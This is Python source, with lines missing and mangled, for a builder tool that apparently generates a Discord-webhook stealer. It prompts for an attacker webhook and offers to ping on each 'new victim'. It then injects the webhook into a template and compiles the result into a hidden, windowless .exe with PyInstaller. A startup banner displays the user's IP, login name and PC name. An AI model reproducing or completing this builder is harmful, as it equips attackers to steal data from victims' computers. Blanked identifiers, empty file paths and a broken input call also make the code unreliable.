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- import os
- import requests
- import random
- import shutil
- import subprocess
- import time
- import sys
- from json import load
- from urllib.request import urlopen
- from alive_progress import alive_bar
- from colorama import Fore, Style, init
- class Builder:
- def __init__(self) -> None:
- self.loading()
- 爪工闩丂 ㄒ龱龱㇄
- if not self.check():
- exit()
- self.webhook = input(
- f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Enter your webhook: ')
- if not self.check_webhook(self.webhook):
- print(
- f"{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} {Fore.RED}Invalid Webhook!{Fore.RESET}")
- str(input(
- f"{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Press anything to exit..."))
- sys.exit()
- self.filename = input(
- f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Enter your filename: ')
- = input(
- f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Ping on new victim? (y/n): ')
- if == 'y':
- = True
- self.pingtype = input(
- f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Ping type (here/everyone): ').lower()
- if self.pingtype not in ["here", "everyone"]:
- # default to @here if invalid ping type.
- self.pingtype == "here"
- else:
- = False
- self.pingtype = "none"
- self.compy = input(
- f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Do you want to compile the file to a .exe? (y/n):')
- self.mk_file(self.filename, self.webhook)
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Built!')
- run = input()
- f'\n\n\n{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Do you want to test run the file? [y/n]: ')
- if run.lower() == 'y':
- input(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Press enter to exit...')
- def loading(self):
- p = Fore.MAGENTA + Style.DIM
- r = Fore.RED + Style.BRIGHT
- img = fr"""{p}
- .
- ,gaaaaaaaagaaaaaaaaaaaaagaaaaaaaag,
- ,aP8b _,dYba, ,adPb,_ d8Ya,
- ,aP" Yb_,dP" "Yba, ,adP" "Yb,_dP "Ya,
- ,aP" _88" )888( "88_ "Ya,
- ,aP" _,dP"Yb ,adP"8"Yba, dP"Yb,_ "Ya,
- ,aPYb _,dP8 Yb ,adP" 8 "Yba, dP 8Yb,_ dPYa,
- ,aP" YdP" dP YbdP" 8 "YbdP Yb "YbP "Ya,
- I8aaaaaa8aaa8baaaaaa88aaaaaaaa8aaaaaaaa88aaaaaad8aaa8aaaaaa8I
- `Yb, d8a, Ya d8b, 8 ,d8b aP ,a8b ,dP'
- "Yb,dP "Ya "8, dI "Yb, 8 ,dP" Ib ,8" aP" Yb,dP"
- "Y8, "YaI8, ,8' "Yb, 8 ,dP" `8, ,8IaP" ,8P"
- "Yb, `"Y8ad' "Yb,8,dP" `ba8P"' ,dP"
- "Yb, `"8, "Y8P" ,8"' ,dP"
- "Yb, `8, 8 ,8' ,dP"
- "Yb, `Ya 8 aP' ,dP"
- "Yb, "8, 8 ,8" ,dP"
- "Yb, `8, 8 ,8' ,dP"
- "Yb, `Ya 8 aP' ,dP"
- "Yb, "8, 8 ,8" ,dP"
- "Yb,`8, 8 ,8',dP"
- "Yb,Ya8aP,dP"
- "Y88888P"
- "Y8P"
- run the skids! "
- IP: {load(urlopen(''))['ip']}
- Username: {os.getlogin()}
- PC Name: {os.getenv('COMPUTERNAME')}
- Operating System: {os.getenv('OS')}
- with alive_bar(40) as bar:
- for _ in range(40):
- print(img)
- time.sleep(random.randint(1, 3) / 40)
- os.system('cls')
- bar()
- os.system('cls')
- print(Style.RESET_ALL)
- def check_webhook(self, webhook):
- try:
- with requests.get(webhook) as r:
- if r.status_code == 200:
- return True
- else:
- return False
- except BaseException:
- return False
- def check(self):
- required_files = {'./',
- './requirements.txt', }
- for file in required_files:
- if not os.path.isfile(file):
- print(f'{Fore.RED}[!]{Fore.RESET} {file} not found!')
- return False
- try:
- print(
- subprocess.check_output(
- "python -V",
- stderr=subprocess.STDOUT))
- print(subprocess.check_output("pip -V", stderr=subprocess.STDOUT))
- except subprocess.CalledProcessError:
- print(f'{Fore.RED}[!]{Fore.RESET} Python not found!')
- return False
- os.system('pip install --upgrade -r requirements.txt')
- os.system('cls')
- os.system('mode con:cols=150 lines=20')
- return True
- def mk_file(self, filename, webhook):
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Generating source code...')
- with open('./', 'r', encoding="utf-8") as f:
- code =
- with open(f"{filename}.py", "w", encoding="utf-8") as f:
- f.write(code.replace('%webhook_here%', webhook)
- .replace("\"%ping_enabled%\"", str(
- .replace("%ping_type%", self.pingtype))
- if self.compy == 'y':
- self.compile(filename)
- else:
- time.sleep(2)
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Source code has been generated...')
- input(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Press enter to exit...')
- sys.exit()
- def compile(self, filename):
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Compiling code...')
- os.system(
- f'python -m PyInstaller --onefile --noconsole -i NONE --distpath ./ .\\{filename}.py')
- cleans_dir = {'./__pycache__', './build'}
- cleans_file = {f'./{filename}.spec', f'./{filename}.py'}
- for clean in cleans_dir:
- try:
- if os.path.isdir(clean):
- shutil.rmtree(clean)
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} {clean} removed!')
- except Exception:
- print(f'{Fore.RED}[{Fore.RESET}!{Fore.RED}]{Fore.RESET} {clean} not found!')
- continue
- for clean in cleans_file:
- try:
- if os.path.isfile(clean):
- os.remove(clean)
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} {clean} removed!')
- except Exception:
- print(f'{Fore.RED}[!]{Fore.RESET} {clean} not found!')
- continue
- def run(self, filename):
- print(f'{Fore.MAGENTA}[{Fore.RESET}+{Fore.MAGENTA}]{Fore.RESET} Attempting to execute file...')
- if os.path.isfile(f'./{filename}.exe'):
- os.system(f'start ./{filename}.exe')
- if __name__ == '__main__':
- init()
- if != "nt":
- os.system("clear")
- else:
- os.system('mode con:cols=212 lines=212')
- os.system("cls")
- Builder()
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